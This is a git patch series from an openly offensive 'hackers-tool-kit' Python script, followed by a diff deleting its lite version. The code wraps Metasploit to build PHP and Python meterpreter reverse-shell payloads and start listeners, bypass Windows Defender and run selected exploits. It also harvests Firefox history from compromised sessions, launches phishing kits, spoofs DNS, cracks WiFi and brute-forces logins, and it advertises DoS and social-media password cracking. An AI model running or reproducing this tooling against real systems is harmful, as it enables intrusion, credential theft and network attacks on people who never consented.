+ os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#DNS SPOOF START# +#---------------# +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + + +#-------------# +#DNS SPOOF END# + + +#REBOOT HTK START# +#----------# +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() +#--------------# +#REBOOT HTK END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + try: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoofall": + dnsspoofall() + if x == "htk-lite": + os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") + if x == "reboot": + reboot() + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True + +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 0febe6c1c1b51d3792f12c5ce3683612d4fb38f4 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 3 Dec 2019 20:20:09 +0000 Subject: [PATCH 208/214] Delete htkl.py --- htk-lite/htkl.py | 1899 ---------------------------------------------- 1 file changed, 1899 deletions(-) delete mode 100644 htk-lite/htkl.py diff --git a/htk-lite/htkl.py b/htk-lite/htkl.py deleted file mode 100644 index 27b9b8d..0000000 --- a/htk-lite/htkl.py +++ /dev/null @@ -1,1899 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @tuf_unkn0wn -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import smtplib -import random -import requests -import os -import sys -import socks -import socket -import readline -import time -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) - -os.system("printf '\e[8;27;100t'") -os.system("printf '\033]2;Hackers-Tool-Kit-Lite | HTK-Lite | @tuf_unkn0wn\a'") - -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -BD = '\033[1m' - -lred = '\033[91m' -lblue = '\033[94m' -lgreen = '\033[92m' -yellow = '\033[93m' -cyan = '\033[1;36m' -purple = '\033[95m' -red = '\033[31m' -green = '\033[32m' -blue = '\033[34m' -orange = '\033[33m' - -colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] -randomcolor = random.choice(colorlist) -banner3list = [red, blue, green, purple] -inputlist = ['☢', '☣', '☠', '♠', '❖', '⚛', '☘', '♞', '⚄', '⚒', '⚓', '⚔', '⬖', '⬗', '⬘', '⬙'] - - -def starting(): - os.system("service tor start") - os.system("service postgresql start") - - os.system("clear") - - for x in range(5): - - print(random.choice(colorlist) + "##########") - - time.sleep(0.1) - - os.system("clear") - - print(random.choice(colorlist) + "++########") - - time.sleep(0.1) - - os.system("clear") - - print(random.choice(colorlist) + "++++######") - - time.sleep(0.1) - - os.system("clear") - - print(random.choice(colorlist) + "++++++####") - - time.sleep(0.1) - - os.system("clear") - - print(random.choice(colorlist) + "++++++++##") - - time.sleep(0.1) - - os.system("clear") - - - - - -def mainbanner1(): - print """\033[1;36m - ┬ ┬┌┬┐┌─┐\033[0m - │ │ │ ├┤ \033[1;36m - ┴─┘┴ ┴ └─┘ \033[0m -██╗ ██╗████████╗██╗ ██╗ -██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m -███████║ ██║ █████╔╝ \033[0m -██╔══██║ ██║ ██╔═██╗ -██║ ██║ ██║ ██║ ██╗ -╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ - \n""".decode('utf-8') - -def mainbanner2(): - print """ - ░░▒█████████ - ▒▓▓█████████████ - ░▓█████████████████████░ ░▒███▓ - ░▓██████████████████████████████████ - ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ - ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ - ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ - ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ - ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ - ░▒░░░░░░▒░░░░░░░ - \n""".decode('utf-8') - -def mainbanner3(): - print """ -╔═══════════════════════════════════════════════╗ -║ ║ -║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ -║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ -║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ -║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ -║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ -║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ -║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ -║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ -║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ -║ ║ -║ ║ -╚═══════════════════════════════════════════════╝ - """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) - -def mainbanner4(): - print """\033[0m -████████████████████████████████████████████████████████████████████████████\033[91m -███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m -████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m -████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m -████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m -████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m -████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m -███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m -████████████████████████████████████████████████████████████████████████████ - \033[0m\n""".decode('utf-8') - -def mainbanner5(): - print """\033[92m - - █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ - ███ ███ ▄█████████▄ ███▐██▀ - ███ ███ ██▀▀███▀▀██ █████▀ - ███▄▄▄▄███ ▀ ███ ▀ ██████▄ - ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ - ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m - ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m - █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m - - - - ███ - █ █ - █ █ ██ ████████ ███████ - █ █ ██ ██ ██ - █ █ ██ ██ █████ - █ █ ▄ ██ ██ ██ - █████▄▄██ ██ ██ ███████ - - - """.decode('utf-8') - -def mainbanner6(): - print """ - • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• - \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. -. \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. - \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ -▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. - .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. - \033[35m█+█ █+█ \033[0m. \033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ -\033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ - \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] - """.decode('utf-8') -def mainbanner7(): - print """\033[31m -██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ -██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ -███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ -██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ -██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ -╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m - """.decode('utf-8') - -def mainbanner8(): - print """\033[34m -██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ -██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ -███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ -██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ -██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ -╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ - \033[0m""".decode('utf-8') - -def mainbanner9(): - print """\033[93m -██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ -██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ -███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ -██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ -██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ -╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ - \033[0m""".decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,9) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - -def helpbanner(): - a = os.popen("ls commandlist -1 | wc -l").read() - b = a.replace('\n', '') - print """ -╔══════════════════════════════════════════════════════════╗ -║ ║ -║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ -║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ -║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ -║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ -║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ -║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ -║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ -║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ -║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ -║ ║ -║══════════════════════════════════════════════════════════║ -║ Commands: [\033[32m{0}\033[0m] Banners: [\033[31m9\033[0m] ║ -║══════════════════════════════════════════════════════════════════════════════════════╗ -║ ? | this menu ║ -║ exit | exit htkl ║ -║ reboot | reboot htkl ║ -║ clear | clears screen ║ -║ banner | shows a banner ║ -║ command | run a terminal command ║ -║ terminal | open another terminal ║ -║ sysinfo | gather information about your device ║ -║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ -║ dos | run Denial-Of-Service attacks ║ -║ payload | Make a msf payload ║ -║ password | crack social media, service and wifi passwords ║ -║ monitor | turn monitor mode on and off [monitor on | monitor off] ║ -║ anon | make yourself anonymous [anon on | anon off] ║ -║ netscan | gather information about your network ║ -║ verscan | scan for a service version on a host ║ -║ wordlist | make wordlists ║ -║ arpspoof | ARP Spoofing ║ -║ traff | show internet traffic ║ -║ hashid | find out what type of hash a hash is ║ -║ aserver | start a apache server ║ -║ dnsspoof | DNS Spoofing [to dns spoof subnet type dnsspoof --all] ║ -║ ║ -║ ║ -║ ║ -║ \033[5m@tuf_unkn0wn\033[0m ║ -╚══════════════════════════════════════════════════════════════════════════════════════╝ - \033[0m\n""".format(b) - -def infoscan(): - try: - target = raw_input("\033[1mTarget:\033[0m ") - port = raw_input("\033[1mPort:\033[0m ") - print "\033[93m! HTTP OR HTTPS !\033[0m\n" - ht = raw_input("[https/http]: ") - if ht == "http": - targetht = 'http://' - if ht == "https": - targetht = 'https://' - print "\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" - os.system("curl {0}".format(target)) - print "\n" - ip = socket.gethostbyname(target) - print G+"------------------------\033[0m" - print N+"\033[1mHost:\033[32m ", target - print N+"\033[1mIP:\033[32m ", ip - print G+"------------------------\033[0m" - os.system("curl -I {0}".format(target)) - print "\n" - request = requests.get(targetht + target) - http = request.status_code - if http == 200: - print("\nServer: [\033[32monline\033[0m]") - else: - print("\nServer: [\033[31moffline\033[0m]") - exit() - print "\n" - whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") - print(whois) - print "\n" - os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) - print "\n" - os.system("wafw00f {0}".format(target)) - print "\n" - os.system("sslscan {0}".format(target)) - print "\n" - os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) - print "\n" - os.system("curl 